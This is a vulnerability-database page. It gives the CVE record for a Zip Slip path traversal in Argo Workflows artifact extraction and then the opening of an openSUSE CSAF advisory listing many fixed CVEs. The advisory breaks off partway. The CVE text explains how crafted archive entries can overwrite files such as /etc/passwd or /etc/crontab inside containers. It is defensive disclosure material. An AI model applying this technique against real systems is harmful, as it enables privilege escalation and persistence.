CVE-2025-62156 (GCVE-0-2025-62156)
Vulnerability from cvelistv5 – Published: 2025-10-14 14:52 – Updated: 2025-10-14 16:04
VLAI?
Summary
Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Versions prior to 3.6.12 and versions 3.7.0 through 3.7.2 contain a Zip Slip path traversal vulnerability in artifact extraction. During artifact extraction the unpack/untar logic (workflow/executor/executor.go) uses filepath.Join(dest, filepath.Clean(header.Name)) without validating that header.Name stays within the intended extraction directory. A malicious archive entry can supply a traversal or absolute path that, after cleaning, overrides the destination directory and causes files to be written outside the /work/tmp extraction path and into system directories such as /etc inside the container. The vulnerability enables arbitrary file creation or overwrite in system configuration locations (for example /etc/passwd, /etc/hosts, /etc/crontab), which can lead to privilege escalation or persistence within the affected container. Update to 3.6.12 or 3.7.3 to remediate the issue.
Severity ?
8.1 (High)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| argoproj | argo-workflows |
Affected:
< 3.6.12
Affected: >= 3.7.0, < 3.7.3 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-62156",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-14T16:04:17.130047Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-14T16:04:24.519Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "argo-workflows",
"vendor": "argoproj",
"versions": [
{
"status": "affected",
"version": "\u003c 3.6.12"
},
{
"status": "affected",
"version": "\u003e= 3.7.0, \u003c 3.7.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Versions prior to 3.6.12 and versions 3.7.0 through 3.7.2 contain a Zip Slip path traversal vulnerability in artifact extraction. During artifact extraction the unpack/untar logic (workflow/executor/executor.go) uses filepath.Join(dest, filepath.Clean(header.Name)) without validating that header.Name stays within the intended extraction directory. A malicious archive entry can supply a traversal or absolute path that, after cleaning, overrides the destination directory and causes files to be written outside the /work/tmp extraction path and into system directories such as /etc inside the container. The vulnerability enables arbitrary file creation or overwrite in system configuration locations (for example /etc/passwd, /etc/hosts, /etc/crontab), which can lead to privilege escalation or persistence within the affected container. Update to 3.6.12 or 3.7.3 to remediate the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-14T14:52:44.502Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf"
},
{
"name": "https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011"
},
{
"name": "https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3"
},
{
"name": "https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993"
}
],
"source": {
"advisory": "GHSA-p84v-gxvw-73pf",
"discovery": "UNKNOWN"
},
"title": "argo-workflows Zip Slip path traversal allows arbitrary file write and container configuration overwrite"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-62156",
"datePublished": "2025-10-14T14:52:44.502Z",
"dateReserved": "2025-10-07T16:12:03.424Z",
"dateUpdated": "2025-10-14T16:04:24.519Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-62156\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-10-14T15:16:12.683\",\"lastModified\":\"2025-11-17T14:27:17.267\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Versions prior to 3.6.12 and versions 3.7.0 through 3.7.2 contain a Zip Slip path traversal vulnerability in artifact extraction. During artifact extraction the unpack/untar logic (workflow/executor/executor.go) uses filepath.Join(dest, filepath.Clean(header.Name)) without validating that header.Name stays within the intended extraction directory. A malicious archive entry can supply a traversal or absolute path that, after cleaning, overrides the destination directory and causes files to be written outside the /work/tmp extraction path and into system directories such as /etc inside the container. The vulnerability enables arbitrary file creation or overwrite in system configuration locations (for example /etc/passwd, /etc/hosts, /etc/crontab), which can lead to privilege escalation or persistence within the affected container. Update to 3.6.12 or 3.7.3 to remediate the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argo_workflows_project:argo_workflows:*:*:*:*:*:kubernetes:*:*\",\"versionEndExcluding\":\"3.6.12\",\"matchCriteriaId\":\"A2C2FFAE-0EDF-4A73-A22A-6390FBF91C1C\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:argo_workflows_project:argo_workflows:*:*:*:*:*:kubernetes:*:*\",\"versionStartIncluding\":\"3.7.0\",\"versionEndExcluding\":\"3.7.3\",\"matchCriteriaId\":\"1E594D88-EEA6-4DAB-BE26-583215BAC976\"}]}]}],\"references\":[{\"url\":\"https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\"]},{\"url\":\"https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-62156\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-14T16:04:17.130047Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-14T16:04:21.505Z\"}}], \"cna\": {\"title\": \"argo-workflows Zip Slip path traversal allows arbitrary file write and container configuration overwrite\", \"source\": {\"advisory\": \"GHSA-p84v-gxvw-73pf\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"argoproj\", \"product\": \"argo-workflows\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.6.12\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.7.0, \u003c 3.7.3\"}]}], \"references\": [{\"url\": \"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf\", \"name\": \"https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011\", \"name\": \"https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3\", \"name\": \"https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993\", \"name\": \"https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Versions prior to 3.6.12 and versions 3.7.0 through 3.7.2 contain a Zip Slip path traversal vulnerability in artifact extraction. During artifact extraction the unpack/untar logic (workflow/executor/executor.go) uses filepath.Join(dest, filepath.Clean(header.Name)) without validating that header.Name stays within the intended extraction directory. A malicious archive entry can supply a traversal or absolute path that, after cleaning, overrides the destination directory and causes files to be written outside the /work/tmp extraction path and into system directories such as /etc inside the container. The vulnerability enables arbitrary file creation or overwrite in system configuration locations (for example /etc/passwd, /etc/hosts, /etc/crontab), which can lead to privilege escalation or persistence within the affected container. Update to 3.6.12 or 3.7.3 to remediate the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-10-14T14:52:44.502Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-62156\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-14T16:04:24.519Z\", \"dateReserved\": \"2025-10-07T16:12:03.424Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-10-14T14:52:44.502Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
OPENSUSE-SU-2025:15710-1
Vulnerability from csaf_opensuse - Published: 2025-11-07 00:00 - Updated: 2025-11-07 00:00Summary
govulncheck-vulndb-0.0.20251105T184115-1.1 on GA media
Notes
Title of the patch
govulncheck-vulndb-0.0.20251105T184115-1.1 on GA media
Description of the patch
These are all security issues fixed in the govulncheck-vulndb-0.0.20251105T184115-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-15710
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "govulncheck-vulndb-0.0.20251105T184115-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the govulncheck-vulndb-0.0.20251105T184115-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15710",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15710-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11063 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11063/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11066 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11067 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11067/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11068 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11068/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11069 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11069/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11070 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11070/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11071 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11071/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11072 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11072/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11073 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11073/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11074 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11074/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11075 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11075/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11076 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11077 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11077/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11078 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11079 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11080 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11080/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11081 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11082 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11082/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11083 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-11084 page",
"url": "https://www.suse.com/security/cve/CVE-2016-11084/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2017-18872 page",
"url": "https://www.suse.com/security/cve/CVE-2017-18872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-32199 page",
"url": "https://www.suse.com/security/cve/CVE-2023-32199/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-58269 page",
"url": "https://www.suse.com/security/cve/CVE-2024-58269/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-10545 page",
"url": "https://www.suse.com/security/cve/CVE-2025-10545/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-10678 page",
"url": "https://www.suse.com/security/cve/CVE-2025-10678/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-10954 page",
"url": "https://www.suse.com/security/cve/CVE-2025-10954/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-11374 page",
"url": "https://www.suse.com/security/cve/CVE-2025-11374/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-11375 page",
"url": "https://www.suse.com/security/cve/CVE-2025-11375/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-11579 page",
"url": "https://www.suse.com/security/cve/CVE-2025-11579/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-11621 page",
"url": "https://www.suse.com/security/cve/CVE-2025-11621/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-12044 page",
"url": "https://www.suse.com/security/cve/CVE-2025-12044/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-26625 page",
"url": "https://www.suse.com/security/cve/CVE-2025-26625/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27093 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-41410 page",
"url": "https://www.suse.com/security/cve/CVE-2025-41410/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-41443 page",
"url": "https://www.suse.com/security/cve/CVE-2025-41443/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54286 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54286/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54287 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54287/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54288 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54288/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54289 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54289/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54290 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54290/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54291 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54291/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54293 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54293/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54469 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54469/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54470 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54470/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54471 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54471/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54499 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54499/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58073 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58073/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58075 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58075/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58356 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58356/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59043 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59043/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59048 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59048/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59530 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59530/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59836 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59836/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-59937 page",
"url": "https://www.suse.com/security/cve/CVE-2025-59937/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-61141 page",
"url": "https://www.suse.com/security/cve/CVE-2025-61141/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-61524 page",
"url": "https://www.suse.com/security/cve/CVE-2025-61524/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-61581 page",
"url": "https://www.suse.com/security/cve/CVE-2025-61581/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-61688 page",
"url": "https://www.suse.com/security/cve/CVE-2025-61688/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62156 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62157 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62157/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62375 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62375/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62506 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62506/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62513 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62513/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62705 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62705/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62714 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62714/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62725 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-62820 page",
"url": "https://www.suse.com/security/cve/CVE-2025-62820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64101 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64101/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64102 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64102/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64103 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64103/"
}
],
"title": "govulncheck-vulndb-0.0.20251105T184115-1.1 on GA media",
"tracking": {
"current_release_date": "2025-11-07T00:00:00Z",
"generator": {
"date": "2025-11-07T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15710-1",
"initial_release_date": "2025-11-07T00:00:00Z",
"revision_history": [
{
"date": "2025-11-07T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"product": {
"name": "govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"product_id": "govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"product": {
"name": "govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"product_id": "govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"product": {
"name": "govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"product_id": "govulncheck-vulndb-0.0.20251105T184115-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64",
"product": {
"name": "govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64",
"product_id": "govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64"
},
"product_reference": "govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le"
},
"product_reference": "govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20251105T184115-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x"
},
"product_reference": "govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
},
"product_reference": "govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2016-11063",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11063"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.5.1. XSS can occur via file preview.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11063",
"url": "https://www.suse.com/security/cve/CVE-2016-11063"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
